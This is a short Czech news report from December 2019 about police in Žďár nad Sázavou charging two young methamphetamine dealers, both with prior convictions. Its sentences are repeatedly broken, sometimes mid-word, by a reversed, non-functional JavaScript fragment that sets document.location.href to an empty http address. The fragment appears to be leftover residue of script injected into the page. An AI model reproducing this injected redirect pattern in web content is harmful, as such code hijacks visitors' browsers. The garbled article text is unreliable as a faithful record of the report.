Rainbow page separator

Policisté dopadli mladé dealery drog, oba s trestní minulostí

Neděle, 1. prosince 2019

Žďár nad Sázavou / Dva mladé drogové dealery se podařilo odhalit žďárským kriminalistům. Šestadvacetiletého muže zadrželi ve Žďáře bezprostředně poté, co přijel do města s novou zásobou drog. Policisté u něj zajistili dvaadevadesát sáčku s pervitinem. Byl obviněný z [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toho, že od srpna na Žďársku drogy prodával dalším osobám nebo je v některých případech poskytl zdarma. „V minulosti byl pro různorodou trestnou činnost odsouzen, a [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to i jako mladistvý. Poslední trest mu soud uložil v roce 2014 v souvislosti s majetkovou trestnou činností,“ uvedla policejní mluvčí Stanislava Miláčková.
Druhého z dvojice obviněných mužů, dvaadvacetiletého, kriminalisté zadrželi ve stejný den taktéž ve Žďáře. Byl obviněný z [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toho, že drogy distribuoval přinejmenším od března. Pervitin prodával, případně jej posky[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toval výměnou například za různé elektronické spotřebiče. Muž byl za drogovou trestnou činnost odsouzen už na konci loňského roku, kdy vyvázl s podmíněným trestem.
Na základě důkazů policejní komisař zahájil trestní stíhání obou dealerů. „Šestadvacetiletý muž byl obviněn ze spáchání přečinu nedovolené výroby a jiného nakládání s omamnými a psychotropními látkami a s jedy. Dvaadvacetiletý muž byl obviněn ze spáchání zvlášť závažného zločinu nedovolené výroby a jiného nakládání s omamnými a psychotropními látkami a s jedy,“ upřesnil vedoucí žďárského oddělení obecné kriminality Radek Uhlíř. Případ kriminalisté dále vyšetřují. Šestadvacetiletému dealerovi hrozí maximálně pětiletý trest odnětí svobody, v případě dvaadvacetiletého muže se jedná až o desetiletý trest.